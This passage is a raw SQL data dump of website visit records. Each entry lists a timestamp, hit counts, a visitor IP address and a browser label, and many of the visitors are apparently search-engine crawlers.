41172,1464474263,1,0,1,0,'66.249.78.178',''),(41173,1464474385,4,4,0,0,'88.198.230.79','other'),(41174,1464475525,1,1,0,0,'5.153.233.130','msie'),(41175,1464475662,1,0,1,0,'66.249.78.136',''),(41176,1464475738,1,0,1,0,'66.249.78.178',''),(41177,1464477773,1,0,1,0,'66.249.78.150',''),(41178,1464479659,1,0,1,0,'66.249.78.164',''),(41179,1464481168,1,1,0,0,'130.193.51.83','other'),(41180,1464482993,1,0,1,0,'66.249.78.164',''),(41181,1464484696,1,0,1,0,'66.249.78.143',''),(41182,1464484944,1,0,1,0,'66.249.76.60',''),(41183,1464484946,2,0,2,0,'66.249.78.164',''),(41184,1464484971,1,1,0,0,'180.76.15.158','other'),(41185,1464485246,1,1,0,0,'141.8.183.25','other'),(41186,1464488227,1,1,0,0,'82.145.219.75','other'),(41187,1464488578,1,0,1,0,'66.249.78.143',''),(41188,1464488737,1,1,0,0,'40.77.167.72','other'),(41189,1464491112,1,0,1,0,'66.249.66.82',''),(41190,1464492440,1,0,1,0,'66.249.78.164',''),(41191,1464492696,1,0,1,0,'66.249.78.178',''),(41192,1464495023,1,1,0,0,'5.255.253.113','other'),(41193,1464495237,1,0,1,0,'66.249.78.178',''),(41194,1464495445,1,1,0,0,'130.193.51.19','other'),(41195,1464496823,1,1,0,0,'66.249.78.164','chrome'),(41196,1464496951,2,2,0,0,'66.249.78.178','chrome'),(41197,1464496982,1,1,0,0,'66.249.66.57','chrome'),(41198,1464497439,1,1,0,0,'207.46.13.183','other'),(41199,1464497472,1,1,0,0,'207.46.13.11','other'),(41200,1464498347,1,0,1,0,'66.249.78.136',''),(41201,1464498909,1,1,0,0,'130.193.50.34','other'),(41202,1464499106,1,1,0,0,'141.8.142.58','other'),(41203,1464501265,2,0,2,0,'66.249.78.171',''),(41204,1464508637,1,1,0,0,'188.163.79.56','chrome'),(41205,1464511664,1,1,0,0,'141.8.183.25','other'),(41206,1464511793,1,1,0,0,'141.8.132.105','other'),(41207,1464512194,1,0,1,0,'66.249.78.171',''),(41208,1464512894,1,1,0,0,'37.53.225.147','chrome'),(41209,1464512920,1,1,0,0,'5.255.253.113','other'),(41210,1464516762,1,1,0,0,'130.193.50.34','other'),(41211,1464521300,1,1,0,0,'141.8.183.25','other'),(41212,1464521520,1,0,1,0,'68.180.231.49',''),(41213,1464523764,1,1,0,0,'141.8.132.105','other'),(41214,1464523900,1,1,0,0,'141.8.183.25','other'),(41215,1464526144,1,0,1,0,'66.249.78.143',''),(41216,1464527766,1,1,0,0,'141.8.132.105','other'),(41217,1464528873,1,1,0,0,'178.154.189.202','other'),(41218,1464529789,1,1,0,0,'92.113.191.184','firefox'),(41219,1464529913,1,1,0,0,'82.145.218.195','other'),(41220,1464530022,1,1,0,0,'151.80.44.159','msie'),(41221,1464531161,2,2,0,0,'130.193.50.34','other'),(41222,1464532851,1,1,0,0,'141.8.132.105','other'),(41223,1464534434,1,1,0,0,'141.8.183.25','other'),(41224,1464534921,1,1,0,0,'207.46.13.11','other'),(41225,1464534976,1,0,1,0,'66.249.78.164',''),(41226,1464537969,1,0,1,0,'66.249.66.60',''),(41227,1464538309,1,1,0,0,'66.249.66.76','chrome'),(41228,1464541286,1,1,0,0,'178.94.172.189','chrome'),(41229,1464545233,1,0,1,0,'66.249.66.60',''),(41230,1464550934,1,1,0,0,'82.145.211.106','other'),(41231,1464552436,1,1,0,0,'130.193.51.43','other'),(41232,1464552609,1,1,0,0,'141.8.184.11','other'),(41233,1464554727,1,1,0,0,'66.249.78.171','chrome'),(41234,1464555651,1,0,1,0,'66.249.78.136',''),(41235,1464558316,1,0,1,0,'66.249.78.136',''),(41236,1464558408,1,0,1,0,'66.249.66.54',''),(41237,1464563164,2,2,0,0,'141.8.132.105','other'),(41238,1464563280,1,1,0,0,'130.193.50.34','other'),(41239,1464565363,1,1,0,0,'180.76.15.26','other'),(41240,1464565474,14,14,0,0,'51.255.194.31','other'),(41241,1464567107,1,1,0,0,'5.35.93.15','chrome'),(41242,1464567339,1,1,0,0,'5.255.253.36','other'),(41243,1464567494,1,1,0,0,'141.8.132.105','other'),(41244,1464567698,1,1,0,0,'130.193.50.34','other'),(41245,1464567838,1,1,0,0,'130.193.51.83','other'),(41246,1464568134,3,3,0,0,'5.35.93.15','chrome'),(41247,1464568904,1,0,1,0,'66.249.78.143',''),(41248,1464574343,1,1,0,0,'130.193.50.34','other'),(41249,1464574501,1,1,0,0,'141.8.132.105','other'),(41250,1464575765,1,1,0,0,'130.193.50.34','other'),(41251,1464579411,1,1,0,0,'95.134.221.77','chrome'),(41252,1464579437,1,1,0,0,'141.8.132.105','other'),(41253,1464582167,1,0,1,0,'66.249.66.57',''),(41254,1464582663,20,20,0,0,'144.76.12.75','other'),(41255,1464582817,1,1,0,0,'93.158.152.203','other'),(41256,1464583807,1,0,1,0,'66.249.78.143',''),(41257,1464584629,1,0,1,0,'68.180.231.49',''),(41258,1464585559,1,1,0,0,'130.193.50.34','other'),(41259,1464586623,1,1,0,0,'66.249.93.153','chrome'),(41260,1464587398,1,0,1,0,'66.249.78.178',''),(41261,1464587616,1,1,0,0,'141.8.132.105','other'),(41262,1464588548,1,1,0,0,'141.8.132.105','other'),(41263,1464588564,1,1,0,0,'88.135.218.123','chrome'),(41264,1464588716,2,2,0,0,'130.193.50.34','other'),(41265,1464589151,1,1,0,0,'176.241.109.84','firefox'),(41266,1464589275,1,1,0,0,'94.179.56.10','chrome'),(41267,1464589617,1,1,0,0,'91.196.178.39','chrome'),(41268,1464590326,1,1,0,0,'176.122.98.124','chrome'),(41269,1464590519,1,1,0,0,'95.133.197.45','chrome'),(41270,1464590540,1,1,0,0,'94.179.63.250','firefox'),(41271,1464590550,1,1,0,0,'91.196.178.69','firefox'),(41272,1464591270,1,1,0,0,'130.193.50.34','other'),(41273,1464591435,1,0,1,0,'66.249.66.79',''),(41274,1464591680,1,1,0,0,'141.8.183.25','other'),(41275,1464592421,1,0,1,0,'66.249.78.164',''),(41276,1464592626,1,1,0,0,'91.196.178.67','chrome'),(41277,1464593344,1,1,0,0,'92.113.193.90','chrome'),(41278,1464593381,1,1,0,0,'141.8.132.105','other'),(41279,1464593960,1,1,0,0,'94.179.114.82','chrome'),(41280,1464594226,1,1,0,0,'91.231.229.41','chrome'),(41281,1464594259,1,1,0,0,'94.179.119.114','firefox'),(41282,1464595053,1,1,0,0,'91.196.178.72','chrome'),(41283,1464595084,1,1,0,0,'91.196.178.69','firefox'),(41284,1464596200,1,1,0,0,'92.112.200.129','chrome'),(41285,1464596260,1,1,0,0,'91.196.177.96','firefox'),(41286,1464597610,1,1,0,0,'91.196.178.162','chrome'),(41287,1464598074,1,0,1,0,'68.180.231.49',''),(41288,1464598872,1,1,0,0,'5.255.253.113','other'),(41289,1464598997,3,3,0,0,'130.193.51.19','other'),(41290,1464599217,1,1,0,0,'157.55.39.134','other'),(41291,1464599290,1,1,0,0,'141.8.142.58','other'),(41292,1464599354,1,1,0,0,'37.115.161.42','chrome'),(41293,1464599562,1,1,0,0,'193.93.228.47','chrome'),(41294,1464599972,1,1,0,0,'87.76.66.130','chrome'),(41295,1464600374,1,1,0,0,'91.196.178.72','chrome'),(41296,1464600512,1,1,0,0,'37.55.61.43','chrome'),(41297,1464600523,1,0,1,0,'66.249.78.178',''),(41298,1464601290,1,1,0,0,'91.196.178.69','firefox'),(41299,1464602022,1,1,0,0,'91.196.178.66','chrome'),(41300,1464602228,1,1,0,0,'130.193.50.34','other'),(41301,1464602354,1,1,0,0,'130.193.51.19','other'),(41302,1464602396,1,1,0,0,'92.112.200.129','chrome'),(41303,1464602606,1,1,0,0,'141.8.132.105','other'),(41304,1464602756,1,1,0,0,'5.255.253.113','other'),(41305,1464603655,1,0,1,0,'66.249.78.171',''),(41306,1464604945,1,1,0,0,'77.88.217.74','msie'),(41307,1464604966,1,0,1,0,'66.249.78.178',''),(41308,1464606164,1,1,0,0,'178.94.25.233','chrome'),(41309,1464606214,1,1,0,0,'5.255.253.113','other'),(41310,1464606460,2,0,2,0,'66.249.78.178',''),(41311,1464607027,1,1,0,0,'176.122.98.124','chrome'),(41312,1464608029,2,2,0,0,'91.196.178.69','firefox'),(41313,1464608056,1,1,0,0,'91.196.178.66','chrome'),(41314,1464608085,1,1,0,0,'95.132.106.65','chrome'),(41315,1464608538,1,1,0,0,'82.207.91.234','firefox'),(41316,1464609397,1,1,0,0,'141.8.132.105','other'),(41317,1464609676,1,1,0,0,'130.193.51.19','other'),(41318,1464609877,1,1,0,0,'157.55.39.181','other'),(41319,1464610167,1,1,0,0,'95.132.106.65','chrome'),(41320,1464610187,1,1,0,0,'176.122.98.124','chrome'),(41321,1464610321,1,1,0,0,'195.162.71.207','chrome'),(41322,1464610862,1,1,0,0,'91.196.178.66','chrome'),(41323,1464611145,1,1,0,0,'94.179.122.107','firefox'),(41324,1464611393,1,1,0,0,'109.227.98.209','chrome'),(41325,1464611660,1,1,0,0,'37.53.90.175','chrome'),(41326,1464612344,1,1,0,0,'82.145.208.4','other'),(41327,1464612361,1,1,0,0,'5.255.253.113','other'),(41328,1464613120,1,1,0,0,'46.201.239.218','firefox'),(41329,1464613149,2,2,0,0,'141.8.132.105','other'),(41330,1464613156,99,99,0,0,'208.43.225.84','other'),(41331,1464613265,1,1,0,0,'91.219.144.98','chrome'),(41332,1464613347,1,1,0,0,'176.122.98.124','chrome'),(41333,1464613476,30,30,0,0,'208.43.225.85','other'),(41334,1464613628,2,2,0,0,'130.193.50.34','other'),(41335,1464613686,1,1,0,0,'91.196.178.69','firefox'),(41336,1464614362,1,0,1,0,'66.249.66.57',''),(41337,1464614558,1,1,0,0,'185.84.148.4','firefox'),(41338,1464615083,1,1,0,0,'91.196.178.66','firefox'),(41339,1464615509,1,1,0,0,'91.196.178.66','chrome'),(41340,1464616408,1,1,0,0,'212.26.136.34','chrome'),(41341,1464616500,1,1,0,0,'69.30.213.82','other'),(41342,1464616608,1,1,0,0,'93.74.10.215','chrome'),(41343,1464617124,2,2,0,0,'130.193.50.34','other'),(41344,1464619131,1,1,0,0,'91.196.178.164','chrome'),(41345,1464620207,1,0,1,0,'66.249.78.136',''),(41346,1464620461,1,1,0,0,'141.8.183.25','other'),(41347,1464620997,1,1,0,0,'5.255.253.113','other'),(41348,1464621293,1,1,0,0,'212.26.136.34','chrome'),(41349,1464621569,1,1,0,0,'180.76.15.135','other'),(41350,1464621634,1,0,1,0,'66.249.78.164',''),(41351,1464621920,1,1,0,0,'141.8.132.105','other'),(41352,1464623521,1,1,0,0,'91.196.178.66','firefox'),(41353,1464625127,1,1,0,0,'66.249.78.150','chrome'),(41354,1464625138,1,1,0,0,'66.249.78.178','chrome'),(41355,1464625799,1,1,0,0,'130.193.50.34','other'),(41356,1464625943,2,2,0,0,'130.193.51.19','other'),(41357,1464626815,1,0,1,0,'66.249.78.178',''),(41358,1464626930,3,3,0,0,'88.233.239.40','other'),(41359,1464627752,1,0,1,0,'66.249.78.178',''),(41360,1464627753,1,0,1,0,'66.249.78.164',''),(41361,1464627936,1,1,0,0,'46.219.248.6','chrome'),(41362,1464628502,2,2,0,0,'141.8.132.105','other'),(41363,1464629483,1,1,0,0,'92.113.191.184','firefox'),(41364,1464632273,248,248,0,0,'62.210.148.247','other'),(41365,1464632629,1,1,0,0,'5.255.253.113','other'),(41366,1464632909,1,1,0,0,'130.193.50.34','other'),(41367,1464633667,2,2,0,0,'176.103.4.131','firefox'),(41368,1464634228,1,0,1,0,'66.249.78.150',''),(41369,1464635728,1,1,0,0,'5.255.253.113','other'),(41370,1464636759,1,1,0,0,'91.196.178.35','chrome'),(41371,1464637984,3,3,0,0,'130.193.50.34','other'),(41372,1464638234,2,2,0,0,'141.8.132.105','other'),(41373,1464638766,1,1,0,0,'141.8.183.25','other'),(41374,1464638893,1,1,0,0,'5.255.253.113','other'),(41375,1464639242,1,1,0,0,'130.193.50.34','other'),(41376,1464641680,1,1,0,0,'130.193.50.34','other'),(41377,1464642840,1,0,1,0,'66.249.78.171',''),(41378,1464642843,1,0,1,0,'66.249.66.76',''),(41379,1464643145,1,0,1,0,'66.249.78.143',''),(41380,1464643367,1,1,0,0,'180.76.15.134','other'),(41381,1464643945,1,1,0,0,'141.8.132.105','other'),(41382,1464644091,1,1,0,0,'130.193.51.83','other'),(41383,1464644355,2,2,0,0,'130.193.50.34','other'),(41384,1464644912,3,3,0,0,'130.193.51.19','other'),(41385,1464645050,1,1,0,0,'141.8.132.105','other'),(41386,1464645324,2,2,0,0,'5.255.253.113','other'),(41387,1464645437,3,3,0,0,'141.8.183.25','other'),(41388,1464645451,2,2,0,0,'130.193.51.83','other'),(41389,1464645576,1,1,0,0,'141.8.142.58','other'),(41390,1464645826,1,1,0,0,'130.193.51.19','other'),(41391,1464648608,2,2,0,0,'141.8.183.25','other'),(41392,1464648736,2,2,0,0,'5.255.253.113','other'),(41393,1464649113,2,2,0,0,'130.193.50.34','other'),(41394,1464649366,1,1,0,0,'130.193.51.19','other'),(41395,1464649495,1,1,0,0,'141.8.132.105','other'),(41396,1464651708,1,1,0,0,'141.0.15.182','other'),(41397,1464651809,1,1,0,0,'141.8.132.105','other'),(41398,1464652481,1,1,0,0,'130.193.50.34','other'),(41399,1464652670,1,1,0,0,'141.8.183.25','other'),(41400,1464653443,1,1,0,0,'176.195.114.108','other'),(41401,1464653444,1,1,0,0,'188.255.19.247','firefox'),(41402,1464653445,1,1,0,0,'128.74.244.214','firefox'),(41403,1464654813,1,1,0,0,'141.8.142.58','other'),(41405,1464655089,1,1,0,0,'141.8.132.105','other'),(41406,1464655190,1,1,0,0,'141.8.183.25','other'),(41407,1464655368,1,1,0,0,'5.255.253.113','other'),(41408,1464656368,2,2,0,0,'141.8.132.105','other'),(41409,1464656505,1,1,0,0,'130.193.51.83','other'),(41410,1464656759,1,1,0,0,'130.193.51.19','other'),(41411,1464657901,1,1,0,0,'141.8.132.105','other'),(41412,1464659595,1,1,0,0,'141.8.132.105','other'),(41413,1464660991,1,0,1,0,'66.249.78.178',''),(41414,1464661045,1,1,0,0,'5.255.253.113','other'),(41415,1464661264,3,3,0,0,'130.193.51.83','other'),(41416,1464661375,4,4,0,0,'130.193.50.34','other'),(41417,1464661835,2,2,0,0,'141.8.132.105','other'),(41418,1464662766,1,1,0,0,'130.193.50.34','other'),(41419,1464664686,1,1,0,0,'91.196.178.39','chrome'),(41420,1464665589,1,1,0,0,'66.249.78.164','chrome'),(41421,1464665700,1,1,0,0,'66.249.78.178','chrome'),(41422,1464667825,3,3,0,0,'141.8.132.105','other'),(41423,1464667830,2,2,0,0,'130.193.50.34','other'),(41424,1464668015,2,2,0,0,'130.193.51.83','other'),(41425,1464668772,2,2,0,0,'141.8.183.25','other'),(41426,1464669095,1,1,0,0,'5.255.253.113','other'),(41427,1464669245,1,1,0,0,'130.193.50.34','other'),(41428,1464671344,2,2,0,0,'5.255.253.113','other'),(41429,1464671550,1,1,0,0,'130.193.50.34','other'),(41430,1464671588,1,1,0,0,'91.196.178.69','firefox'),(41431,1464671688,1,1,0,0,'94.179.106.177','chrome'),(41432,1464671765,1,1,0,0,'141.8.183.25','other'),(41433,1464672374,1,1,0,0,'91.196.178.135','firefox'),(41434,1464672407,1,1,0,0,'157.55.39.181','other'),(41435,1464672991,1,1,0,0,'141.8.132.105','other'),(41436,1464673765,1,1,0,0,'37.53.90.175','chrome'),(41437,1464673928,1,1,0,0,'95.133.197.45','chrome'),(41438,1464674087,1,1,0,0,'66.249.93.153','chrome'),(41439,1464674705,1,1,0,0,'141.8.132.105','other'),(41440,1464675017,1,1,0,0,'141.8.183.25','other'),(41441,1464675370,1,1,0,0,'91.196.178.66','chrome'),(41442,1464675929,2,2,0,0,'108.59.8.80','other'),(41443,1464676887,1,1,0,0,'141.8.183.25','other'),(41444,1464677092,1,0,1,0,'66.249.78.143',''),(41445,1464677146,1,1,0,0,'91.196.178.167','chrome'),(41446,1464677674,1,1,0,0,'141.8.132.105','other'),(41447,1464677936,1,1,0,0,'5.255.253.113','other'),(41448,1464678133,2,2,0,0,'130.193.50.34','other'),(41449,1464678556,1,1,0,0,'157.55.39.181','other'),(41450,1464678892,1,1,0,0,'51.254.121.187','other'),(41451,1464679180,1,1,0,0,'130.193.50.34','other'),(41452,1464680065,1,1,0,0,'93.73.234.193','firefox'),(41453,1464681387,1,1,0,0,'141.8.142.67','other'),(41454,1464682035,1,1,0,0,'91.196.178.69','firefox'),(41455,1464682628,1,0,1,0,'66.249.78.136',''),(41456,1464682708,1,1,0,0,'91.196.178.38','firefox'),(41457,1464682778,1,1,0,0,'94.179.49.60','opera'),(41458,1464682950,1,1,0,0,'91.196.178.36','chrome'),(41459,1464683979,1,1,0,0,'94.179.106.40','chrome'),(41460,1464684090,1,1,0,0,'91.196.178.67','chrome'),(41461,1464684917,1,0,1,0,'66.249.78.178',''),(41462,1464685366,1,1,0,0,'141.8.183.25','other'),(41463,1464685513,1,1,0,0,'130.193.51.19','other'),(41464,1464686362,1,1,0,0,'91.196.178.69','firefox'),(41465,1464686375,1,1,0,0,'91.196.178.67','chrome'),(41466,1464686874,1,1,0,0,'46.174.67.139','firefox'),(41467,1464686918,1,1,0,0,'213.174.5.135','chrome'),(41468,1464687154,1,1,0,0,'173.208.136.114','chrome'),(41469,1464688146,2,2,0,0,'5.255.253.113','other'),(41470,1464688246,1,1,0,0,'178.95.81.185','opera'),(41471,1464688406,3,3,0,0,'130.193.50.34','other'),(41472,1464688775,1,1,0,0,'141.8.132.105','other'),(41473,1464688924,1,1,0,0,'130.193.51.19','other'),(41474,1464689097,1,1,0,0,'91.196.178.67','firefox'),(41475,1464690484,1,1,0,0,'91.196.178.167','chrome'),(41476,1464690504,1,1,0,0,'157.55.39.134','other'),(41477,1464692916,1,0,1,0,'66.249.78.171',''),(41478,1464692928,3,3,0,0,'130.193.50.34','other'),(41479,1464693333,1,1,0,0,'141.8.132.105','other'),(41480,1464693649,1,1,0,0,'178.95.81.185','opera'),(41481,1464694051,1,1,0,0,'178.92.171.89','chrome'),(41482,1464694503,1,1,0,0,'130.193.51.83','other'),(41483,1464694525,1,1,0,0,'91.196.178.65','firefox'),(41484,1464694636,1,1,0,0,'178.95.81.185','opera'),(41485,1464694914,1,1,0,0,'91.196.178.69','firefox'),(41486,1464695247,1,1,0,0,'46.211.67.11','other'),(41487,1464695442,1,1,0,0,'109.104.170.155','chrome'),(41488,1464695763,2,2,0,0,'130.193.50.34','other'),(41489,1464696300,1,1,0,0,'46.173.160.12','firefox'),(41490,1464696487,1,1,0,0,'37.53.229.98','firefox'),(41491,1464696581,1,1,0,0,'91.196.178.69','firefox'),(41492,1464696733,1,1,0,0,'130.193.50.34','other'),(41493,1464696838,2,2,0,0,'178.95.81.185','opera'),(41494,1464697852,2,2,0,0,'91.196.178.130','chrome'),(41495,1464697989,2,2,0,0,'178.95.81.185','opera'),(41496,1464698307,1,1,0,0,'37.54.183.105','chrome'),(41497,1464698671,1,1,0,0,'66.249.78.164','chrome'),(41498,1464698784,1,1,0,0,'91.196.178.130','chrome'),(41499,1464698831,1,0,1,0,'66.249.78.178',''),(41500,1464699044,1,0,1,0,'66.249.78.171',''),(41501,1464700156,1,1,0,0,'141.8.132.105','other'),(41502,1464700363,2,2,0,0,'95.135.89.71','chrome'),(41503,1464700591,1,1,0,0,'130.193.51.19','other'),(41504,1464701302,1,1,0,0,'95.135.89.71','chrome'),(41505,1464701837,1,1,0,0,'178.95.81.185','opera'),(41506,1464702415,1,1,0,0,'66.249.78.164','chrome'),(41507,1464702787,1,0,1,0,'66.249.78.143',''),(41508,1464703037,1,1,0,0,'91.196.178.35','firefox'),(41509,1464703665,1,1,0,0,'66.249.66.57','chrome'),(41510,1464703816,1,1,0,0,'5.255.253.113','other'),(41511,1464705036,2,2,0,0,'130.193.50.34','other'),(41512,1464705119,1,1,0,0,'91.196.178.70','firefox'),(41513,1464706390,2,2,0,0,'5.255.253.113','other'),(41514,1464706483,1,1,0,0,'130.193.51.83','other'),(41515,1464706515,2,2,0,0,'141.8.132.105','other'),(41516,1464706644,1,1,0,0,'141.8.183.25','other'),(41517,1464707083,1,1,0,0,'178.154.189.202','other'),(41518,1464708519,1,1,0,0,'92.113.157.233','firefox'),(41519,1464711584,1,1,0,0,'141.8.132.105','other'),(41520,1464711844,1,1,0,0,'130.193.50.34','other'),(41521,1464713139,3,3,0,0,'130.193.51.19','other'),(41522,1464713266,1,1,0,0,'141.8.183.25','other'),(41523,1464713697,1,0,1,0,'66.249.78.143',''),(41524,1464713789,1,1,0,0,'5.255.253.113','other'),(41525,1464714039,1,0,1,0,'66.249.78.171',''),(41526,1464715499,1,1,0,0,'66.249.78.143','chrome'),(41527,1464715508,1,1,0,0,'66.249.78.164','chrome'),(41528,1464715969,1,0,1,0,'66.249.78.150',''),(41529,1464717457,1,1,0,0,'92.113.157.233','firefox'),(41530,1464718110,1,1,0,0,'141.8.132.105','other'),(41531,1464719302,1,1,0,0,'5.255.253.113','other'),(41532,1464719682,1,1,0,0,'91.196.178.70','firefox'),(41533,1464721358,1,1,0,0,'141.8.132.105','other'),(41534,1464721767,1,1,0,0,'5.255.253.113','other'),(41535,1464722005,1,1,0,0,'130.193.50.34','other'),(41536,1464722314,2,2,0,0,'91.196.178.37','chrome'),(41537,1464722580,1,1,0,0,'141.8.142.61','other'),(41538,1464722722,1,1,0,0,'193.194.127.217','firefox'),(41539,1464722937,1,1,0,0,'217.20.168.185','chrome'),(41540,1464723196,2,2,0,0,'93.175.238.35','firefox'),(41541,1464724059,1,0,1,0,'66.249.66.57',''),(41542,1464726451,1,1,0,0,'130.193.50.34','other'),(41543,1464727407,1,0,1,0,'66.249.78.143',''),(41544,1464727625,1,1,0,0,'91.196.178.37','chrome'),(41545,1464728589,1,1,0,0,'141.8.132.105','other'),(41546,1464729410,2,2,0,0,'130.193.50.34','other'),(41547,1464729491,2,2,0,0,'141.8.132.105','other'),(41548,1464729662,1,1,0,0,'130.193.51.83','other'),(41549,1464729868,2,2,0,0,'5.255.253.113','other'),(41550,1464732097,1,1,0,0,'141.8.183.25','other'),(41551,1464732219,2,2,0,0,'130.193.50.34','other'),(41552,1464732345,1,1,0,0,'141.8.132.105','other'),(41553,1464732501,1,1,0,0,'141.8.142.61','other'),(41554,1464732939,1,1,0,0,'5.255.253.113','other'),(41555,1464735843,1,1,0,0,'130.193.50.34','other'),(41556,1464736691,4,4,0,0,'144.76.7.107','other'),(41557,1464739943,1,1,0,0,'130.193.50.34','other'),(41558,1464740083,2,2,0,0,'5.255.253.113','other'),(41559,1464740360,1,1,0,0,'141.8.132.105','other'),(41560,1464741342,1,1,0,0,'141.8.132.105','other'),(41561,1464743355,1,1,0,0,'5.255.253.113','other'),(41562,1464743518,1,1,0,0,'130.193.50.34','other'),(41563,1464745001,1,1,0,0,'130.193.50.34','other'),(41564,1464745245,1,1,0,0,'141.8.132.105','other'),(41565,1464745972,3,3,0,0,'178.154.189.202','other'),(41566,1464745983,2,2,0,0,'178.154.189.203','other'),(41567,1464745994,1,1,0,0,'178.154.189.201','other'),(41568,1464746643,2,2,0,0,'141.8.183.25','other'),(41569,1464747238,1,1,0,0,'178.154.189.203','other'),(41570,1464747433,1,1,0,0,'141.8.142.85','other'),(41571,1464747693,1,1,0,0,'180.76.15.5','other'),(41572,1464747829,1,1,0,0,'130.193.50.34','other'),(41573,1464748226,1,1,0,0,'130.193.51.19','other'),(41574,1464748607,1,0,1,0,'66.249.78.143',''),(41575,1464748617,1,0,1,0,'66.249.78.136',''),(41576,1464748983,1,1,0,0,'130.193.51.83','other'),(41577,1464749733,1,1,0,0,'130.193.51.19','other'),(41578,1464750070,2,2,0,0,'130.193.50.34','other'),(41579,1464750664,4,4,0,0,'5.255.253.113','other'),(41580,1464750954,1,1,0,0,'141.8.183.25','other'),(41581,1464751172,3,3,0,0,'141.8.132.105','other'),(41582,1464751360,1,1,0,0,'141.8.142.58','other'),(41583,1464751422,6,6,0,0,'130.193.50.34','other'),(41584,1464751509,1,1,0,0,'178.154.189.203','other'),(41585,1464751612,2,2,0,0,'130.193.51.19','other'),(41586,1464751739,2,2,0,0,'141.8.142.61','other'),(41587,1464754040,1,1,0,0,'37.9.122.203','other'),(41588,1464754060,1,1,0,0,'5.255.253.113','other'),(41589,1464754187,1,1,0,0,'141.8.142.61','other'),(41590,1464754188,7,7,0,0,'141.8.183.25','other'),(41591,1464754564,2,2,0,0,'130.193.51.83','other'),(41592,1464754567,2,2,0,0,'130.193.50.34','other'),(41593,1464755136,1,1,0,0,'178.154.189.202','other'),(41594,1464755193,1,1,0,0,'141.8.132.105','other'),(41595,1464755744,2,0,2,0,'66.249.78.150',''),(41596,1464758032,1,0,1,0,'66.249.78.171',''),(41597,1464758985,1,1,0,0,'91.196.178.135','firefox'),(41598,1464759473,1,1,0,0,'66.249.93.147','chrome'),(41599,1464759809,1,1,0,0,'178.95.81.185','opera'),(41600,1464760743,1,1,0,0,'40.77.167.16','other'),(41601,1464761094,1,1,0,0,'178.95.81.185','opera'),(41602,1464761141,1,1,0,0,'94.178.184.140','chrome'),(41603,1464761290,1,1,0,0,'95.133.197.45','chrome'),(41604,1464761577,1,1,0,0,'94.231.188.10','firefox'),(41605,1464761861,2,2,0,0,'91.196.178.69','firefox'),(41606,1464762358,1,1,0,0,'141.8.132.105','other'),(41607,1464763243,1,1,0,0,'178.95.244.143','firefox'),(41608,1464763512,2,2,0,0,'178.154.189.202','other'),(41609,1464763780,1,0,1,0,'66.249.66.182',''),(41610,1464763792,1,0,1,0,'66.249.78.171',''),(41611,1464763908,1,1,0,0,'88.135.218.123','chrome'),(41612,1464765287,20,20,0,0,'86.57.167.45','chrome'),(41613,1464765542,1,1,0,0,'91.196.178.69','firefox'),(41614,1464765562,1,1,0,0,'195.5.54.246','msie'),(41615,1464765563,1,1,0,0,'195.5.54.246','firefox'),(41616,1464766674,1,1,0,0,'66.249.78.143','chrome'),(41617,1464766866,5,5,0,0,'74.111.12.254','other'),(41618,1464767023,1,1,0,0,'178.95.81.185','opera'),(41619,1464767037,2,2,0,0,'51.254.129.87','other'),(41620,1464768701,1,1,0,0,'130.193.50.34','other'),(41621,1464769732,1,1,0,0,'91.196.178.69','firefox'),(41622,1464770032,1,1,0,0,'91.196.178.66','chrome'),(41623,1464770284,1,1,0,0,'91.195.3.24','chrome'),(41624,1464770358,2,2,0,0,'141.8.183.25','other'),(41625,1464770834,1,1,0,0,'141.8.132.105','other'),(41626,1464770933,1,1,0,0,'92.113.3.110','opera'),(41627,1464771443,2,2,0,0,'88.81.227.74','other'),(41628,1464771651,1,1,0,0,'91.202.128.7','firefox'),(41629,1464771959,1,1,0,0,'178.154.189.201','other'),(41630,1464772860,1,0,1,0,'66.249.66.188',''),(41631,1464772878,1,0,1,0,'66.249.78.171',''),(41632,1464774126,1,1,0,0,'91.196.178.72','chrome'),(41633,1464775255,1,1,0,0,'80.64.173.162','other'),(41635,1464776606,24,24,0,0,'85.14.244.113','other'),(41636,1464776607,33,33,0,0,'193.111.140.106','other'),(41637,1464776609,34,34,0,0,'85.14.244.98','other'),(41638,1464777699,2,2,0,0,'130.193.50.34','other'),(41639,1464777908,1,1,0,0,'91.196.178.168','chrome'),(41640,1464778026,1,1,0,0,'141.8.132.105','other'),(41641,1464778357,1,1,0,0,'91.204.213.42','chrome'),(41642,1464778506,1,0,1,0,'66.249.78.164',''),(41643,1464779177,1,1,0,0,'37.53.157.207','chrome'),(41644,1464779223,1,1,0,0,'195.162.71.207','chrome'),(41645,1464779333,1,1,0,0,'193.93.228.47','chrome'),(41646,1464779833,1,1,0,0,'91.214.19.9','chrome'),(41647,1464780466,1,1,0,0,'91.196.178.67','firefox'),(41648,1464780859,1,1,0,0,'178.154.189.203','other'),(41649,1464781593,1,0,1,0,'66.249.66.183',''),(41650,1464781669,1,1,0,0,'5.255.253.113','other'),(41651,1464781748,1,1,0,0,'91.214.19.9','chrome'),(41652,1464781781,2,2,0,0,'141.8.183.25','other'),(41653,1464782297,1,1,0,0,'37.53.149.166','chrome'),(41654,1464783338,1,1,0,0,'91.196.178.168','chrome'),(41655,1464783634,1,1,0,0,'109.227.98.209','chrome'),(41656,1464783742,1,1,0,0,'94.232.73.155','chrome'),(41657,1464783843,1,1,0,0,'94.178.254.28','chrome'),(41658,1464784354,1,0,1,0,'66.249.78.171',''),(41659,1464784568,1,1,0,0,'91.214.19.9','chrome'),(41660,1464784600,1,1,0,0,'141.8.183.25','other'),(41661,1464784685,1,1,0,0,'95.135.63.210','chrome'),(41662,1464786325,2,2,0,0,'141.8.132.105','other'),(41663,1464786432,1,1,0,0,'130.193.50.34','other'),(41664,1464786987,1,1,0,0,'109.196.181.59','chrome'),(41665,1464787411,1,1,0,0,'91.196.178.69','firefox'),(41666,1464788295,1,0,1,0,'66.249.78.164',''),(41667,1464788319,1,1,0,0,'207.241.226.233','other'),(41668,1464788911,1,1,0,0,'195.230.155.190','firefox'),(41669,1464790052,1,1,0,0,'94.231.188.10','firefox'),(41670,1464790738,1,1,0,0,'178.154.189.202','other'),(41671,1464797222,1,0,1,0,'66.249.66.183',''),(41672,1464797261,1,0,1,0,'66.249.78.143',''),(41673,1464797667,2,2,0,0,'188.166.50.149','other'),(41674,1464799575,1,1,0,0,'91.196.178.67','firefox'),(41675,1464800115,2,1,1,0,'62.210.162.42',''),(41676,1464802427,1,1,0,0,'193.194.127.217','firefox'),(41677,1464802693,3,3,0,0,'141.8.132.105','other'),(41678,1464805345,1,1,0,0,'92.112.124.65','firefox'),(41679,1464805604,1,1,0,0,'91.196.178.163','chrome'),(41680,1464806540,1,1,0,0,'94.179.105.224','firefox'),(41681,1464807153,1,1,0,0,'94.179.246.43','firefox'